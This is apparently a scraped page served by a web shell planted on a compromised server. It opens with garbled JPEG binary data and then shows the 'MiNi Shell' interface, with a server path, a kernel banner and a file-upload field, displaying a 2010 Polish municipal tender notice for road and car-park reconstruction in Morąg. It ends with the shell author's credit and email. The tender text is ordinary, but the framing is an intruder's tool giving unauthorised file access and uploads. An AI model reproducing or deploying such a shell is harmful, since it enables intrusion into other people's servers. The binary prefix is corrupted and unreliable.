JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100223/36935-N-2010.html

<p class="kh_header"><b>Morąg: Przebudowa dróg wewnętrznych, parkingów i przejść dla pieszych - Osiedle Pułaskiego I i II w Morągu</b><br>
<b>Numer ogłoszenia: 36935 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg wewnętrznych, parkingów i przejść dla pieszych - Osiedle Pułaskiego I i II w Morągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zadania na Osiedlu Pułaskiego I:
Przebudowa dróg wewnętrznych, parkingów i przejść dla pieszych na osiedlu Pułaskiego I zawartych pomiędzy ulicami: Pomorska, Pułaskiego i Kujawska w Morągu 

W przebudowie przewidziano rozebranie istniejącej i wykonanie nowych nawierzchni dróg , parkingów i chodników znajdujących się  na działkach gminnych.  Poprawiono przebieg krawędzi dróg , rzędne wysokościowe , promienie łuków poziomych . Poprawiono odwodnienie powierzchniowe i odprowadzenie do sieci kanalizacji burzowej.
 -    powierzchnia dróg i parkingów wynosi  1992 m 2         
 -    powierzchnia chodników wynosi  455 m 2     
Realizacja zadania obejmuje zajęcie terenu działki nr 2-719/3  , 2-727/1 i 2-728/1.
Inwestycja obejmuje wykonanie nowej nawierzchni z kostki Polbruk na podbudowie z  kamienia łamanego na terenie istniejącej starej nawierzchni bitumicznej. Dodatkowo przewidziano wymianę  nawierzchni chodników na terenie działki gminnej. 
Parametry projektowe 
 - Podłoże G-1 
 - Szerokość  placów postojowych 9,0 - 15,4m 
 - Szerokość  dróg dojazdowych  5m 
 - Szerokość  poboczy 0,5m 
              
Geometria pozioma 
 
Przebieg krawędzi pokrywa się  w większości sytuacji z przebiegiem dotychczasowym.  
Łuki poziome na wjazdach : 3,0m , 7,0m , 9,0m.     
 
Rzędne wysokościowe 
 
Rzędne wysokościowe , za wyjątkiem nielicznych i niewielkich zmian , pokrywają  się  z istniejącymi rzędnymi , będąc  związanymi z sąsiadującymi wysokościami przylegających ulic i chodników.  
 
Konstrukcja nawierzchni drogi 
Przyjęto nawierzchnię  o następującej budowie : 
-   Nawierzchnia z kostki Polbruk 8 cm na warstwie wyrównawczej z miału kamiennego grubo ś ci 3-5cm. 
-   Górna warstwa podbudowy z tłucznia kamiennego o uziarnieniu 0-32,5 mm grubości 8cm 
-   Dolna warstwa podbudowy z tłucznia kamiennego o uziarnieniu 0-63mm  grubości 15cm 
-   Warstwa odsączająca z piasku grubości 15cm po zagęszczeniu.

 Konstrukcja nawierzchni chodnika 
-   Nawierzchnia z kostki Polbruk 6 cm  na warstwie wyrównawczej z miału kamiennego grubości 3-5cm 
-   Warstwa odsączająca z piasku grubości 15cm po zagęszczeniu. 
 
 Krawężnik 
Krawężnik posadowić  na ławie betonowej z oporem grubo ś ci 15 cm  z betonu B-15 na wysoko ś ci 12 cm  powyżej poziomu nawierzchni . 
 
Roboty rozbiórkowe 
 
Przed rozpoczęciem robót nawierzchniowych należy rozebrać  istniejące nawierzchnie drogowe i chodnikowe wywożąc materiał w miejsce wskazane przez inwestora. 
 
Roboty ziemne 
 
Zagęszczenie gruntu w korycie powinno spełnia ć  wymagania, dotyczące  minimalnej wartości wskaźnika zagęszczenia (I s= 1,0   ) 
Jeżeli  grunty  rodzime  w  wykopach  i  miejscach  zerowych  nie  maj ą   wymaganego wskaźnika  zagęszczenia,  to  przed  ułożeniem  konstrukcji  nawierzchni  należy  je dogęścić   do  warto ś ci  (I s  ),podanych  wyżej.  (BN-72/9832-02  Budowle  drogowe  i kolejowe . Roboty ziemne) 
 
Warstwa odsączająca 
Warstwa podsypki o grubości 15cm powinna być  wykonana z piasku, albo  żwiru.
 
Odwodnienie 
 
Właściwe odwodnienie powierzchniowe mają  zapewnić  spadki podłużne i poprzeczne.  
Dalszy bieg wód opadowych przejmą  urządzenia odwadniające. 
Do odwodnienia w miejscach spływu wód zastosowano kratki  ś ciekowe  
na studniach O 500 z odstojnikiem min. 0,5m głębokości z odprowadzeniem przykanalikiem O 200 do studni kanalizacji burzowej. 
Kratka  ściekowa zbierająca wodę  z części parkingu na 11 stanowisk , odprowadza wodę  dalej do studni chłonnej o  średnicy 1400mm i głębokości 2m. 
 
Oznakowanie 
Na wyjazdach z dróg wewnętrznych na ulice powiatowe ( Kujawska i Pomorska)  ustawić  znaki A-7 na słupach stalowych ocynkowanych na wysokości 2m ponad nawierzchnię  chodnika. 

Zakres zadania na Osiedlu Pułaskiego II:

Przebudowa dróg wewnętrznych i parkingów na Osiedlu Pułaskiego II, zawartych pomiędzy ulicami Pułaskiego, Pomorską i Mickiewicza w Morągu 

W przebudowie przewidziano rozebranie istniejącej i wykonanie nowych nawierzchni dróg i parkingów  znajdujących się  na działkach gminnych.  
Poprawiono przebieg krawędzi dróg , rzędne wysokościowe , promienie łuków poziomych . 
Poprawiono odwodnienie powierzchniowe i odprowadzenie do sieci kanalizacji burzowej. 
-    powierzchnia dróg i parkingów wynosi  2618 m 2       
Realizacja zadania obejmuje zajęcie terenu działki nr 3-93 ,3-94  i 3-104/9 .

Projekt obejmuje wykonanie nowej nawierzchni z kostki Polbruk na podbudowie z kamienia łamanego na terenie istniejącej starej nawierzchni bitumicznej. Dodatkowo przewidziano wymianę  nawierzchni chodników na terenie działki gminnej. 
 
Parametry projektowe  
 - Podłoże G-1 
 - Szerokość  placów postojowych 9,2 - 14,3m 
 - Szerokość  dróg dojazdowych  4m i 5m 
 - Szerokość  poboczy 1m 
              
Geometria pozioma 
Przebieg krawędzi pokrywa się  w większości sytuacji z przebiegiem dotychczasowym.  
Łuki poziome na wjazdach : 5,0m , 6,0m i  9,0m.    
 
Rzędne wysokościowe 
 
Rzędne wysokościowe , za wyjątkiem nielicznych i niewielkich zmian , pokrywają  się  z istniejącymi rzędnymi , będąc  związanymi z sąsiadującymi wysokościami przylegających ulic i chodników.  
 
Konstrukcja nawierzchni drogi 
 
Przyjęto nawierzchnię  o następującej budowie : 
-   Nawierzchnia z kostki Polbruk na warstwie wyrównawczej z mieszanki piaskowo - cementowej grubo ś ci 3-5cm. 
-   Górna warstwa podbudowy z tłucznia kamiennego o uziarnieniu 0-32,5 mm grubości 8cm 
-   Dolna warstwa podbudowy z tłucznia kamiennego o uziarnieniu 0-63mm  grubości 20cm 
-   Warstwa odsączająca z piasku grubości 15cm po zagęszczeniu. 
 
Na parkingu przy zapleczach sklepów z ulicy Mickiewicza przewidziano 
wykorzystanie istniejącej nawierzchni betonowej jako podbudowa pod kostkę  Polbruk. 
Kostkę  ułożyć  na warstwie miału kamiennego o grubości do 5 cm .  
 
Krawężnik 
 
Krawężnik posadowić  na ławie betonowej z oporem grubości 15 cm  z betonu B-15 na wysoko ś ci 12 cm  powyżej poziomu nawierzchni . 
 
Roboty rozbiórkowe  
Przed rozpoczęciem robót nawierzchniowych należy rozebrać  istniejące nawierzchnie drogowe wywożąc materiał w miejsce wskazane przez inwestora. Część  istniejących nawierzchni pozostaje i służy jako podbudowa. Granica robót rozbiórkowych  jest pokazana na planie sytuacyjnym. 
 
 Roboty ziemne 
Zagęszczenie gruntu w korycie powinno spełniać  wymagania, dotyczące  minimalnej wartości wskaźnika zagęszczenia (I s= 1,0   ) 
Jeżeli  grunty  rodzime  w  wykopach  i  miejscach  zerowych  nie  mają   wymaganego wskaźnika  zagęszczenia,  to  przed  ułożeniem  konstrukcji  nawierzchni  należy  je dogęścić   do  warto ś ci  (I s  ),podanych  wyż ej.  (BN-72/9832-02  Budowle  drogowe  i kolejowe . Roboty ziemne) 
 
Warstwa odsączająca 
 
Warstwa podsypki o grubo ś ci 15cm powinna by ć  wykonana z piasku, albo  żwiru. 

Odwodnienie 
 
Właściwe odwodnienie powierzchniowe mają  zapewnić  spadki podłużne i poprzeczne.  
Dalszy bieg wód opadowych przejmą  urządzenia odwadniające. 
Do odwodnienia w miejscach spływu wód zastosowano kratki  ściekowe  
na studniach O 500 z odstojnikiem min. 0,5m głębokości                          z odprowadzeniem przykanalikiem O 200 do studni kanalizacji burzowej. 
 
Oznakowanie 
Znaki pionowe wykonać  zgodnie z planem sytuacyjnym , mocując  na słupach stalowych ocynkowanych na wysokości 2m ponad nawierzchnię  chodnika. 

Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu zamówień tego samego rodzaju, zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.24-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 35 000.00 PLN (słownie: trzydzieści pięć tysięcy 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności zostanie uznany za spełniony jeżeli Wykonawca wraz z ofertą złoży oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności (zgodnie z załączonym do SIWZ formularzem oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP - Załącznik Nr 5 do SIWZ.
W/w warunek Zamawiający będzie sprawdzał metodą spełnia/nie spełnia na podstawie złożonych oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wg wzoru Załącznika nr 3.
Dysponowanie osobą, której zamierza powierzyć funkcję kierownika budowy do:
- kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Spełnianie warunku zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie dokumentów, o których mowa niżej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a w przypadku jej braku inny  dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówie?nia, jeżeli suma ubezpieczenia wynikająca z polisy lub innego dokumentu ubezpieczenia nie będzie niższa niż 500 000,00zł.
W przypadku składania oferty wspólnej ww. dokumenty składa każdy z wykonawców składających ofertę wspólną. Warunek wysokości sumy ubezpieczenia zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.
Polisa musi być ważna, lub odnawiana przez cały okres realizacji zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dowód wpłaty wadium
2) Wypełniony formularz ofertowy
3) Oświadczenie o zgodności z warunkami przetargu 
4) Zobowiązanie do wniesienia zabezpieczenia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy zawarte są we wzorze umowy, który stanowi załącznik do specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/morag_gmina_miejska/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu
ul. 11 Listopada 9
14-300 Morąg
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2010 godzina 10:00, miejsce: Urząd Miejski w Morągu
ul. 11 Listopada 9
14-300 Morąg
pokój nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Warmia i Mazury na lata 2007-2013, Oś Priorytetowa 4 - Rozwój, restrukturyzacja i rewitalizacja miast, Działanie 4.2 - Rewitalizacja miast..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com